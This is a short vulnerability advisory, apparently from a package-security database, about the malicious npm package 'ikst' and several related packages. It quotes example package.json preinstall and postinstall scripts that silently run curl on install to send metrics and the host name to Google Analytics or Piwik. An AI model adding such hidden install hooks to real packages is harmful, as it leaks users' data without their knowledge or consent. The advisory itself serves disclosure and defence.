Malicious Package Affecting ikst Open this link in a new tab package, versions *
Exploit Maturity
Mature
Attack Complexity
Low
User Interaction
Required
Confidentiality
High
Integrity
High
Availability
High
Do your applications use this vulnerable package?
In a few clicks we can analyze your entire application and see what components are vulnerable in your application, and suggest you quick fixes.
Test your applications-
snyk-id
npm:ikst:20170917
-
published
17 Sep 2017
-
disclosed
8 Aug 2017
-
credit
Jordan Wright
How to fix?
Avoid usage of this package altogether.
Overview
ikst
is a malicious package that was used to collect download metrics beyond what npm provides, and sent them to google analytics or piwik. This can cause a privacy concern amongst users.
This is especially dangerous in production runtime environments, where environment variables tend to consist of keys, passwords, tokens and other secrets.
Example:
{
"name": "npm_scripts_test_metrics",
"scripts": {
"preinstall": "curl 'http://google-analytics.com/collect?v=1&t=event&tid=....'",
"postinstall": "curl 'http://google-analytics.com/collect?v=1&t=event&tid=....'"
}
},
{
"name": "subtitles-lib",
"scripts": {
"postinstall": "bash -c 'curl \"http://*****.piwikpro.com/piwik.php?idsite=3&rec=1&action_name=$HOSTNAME\"'"
}
}
The list of packages and their scripts are:
npm_scripts_test_metrics
subtitles-lib
ikst
botbait
mktmpio
anarchy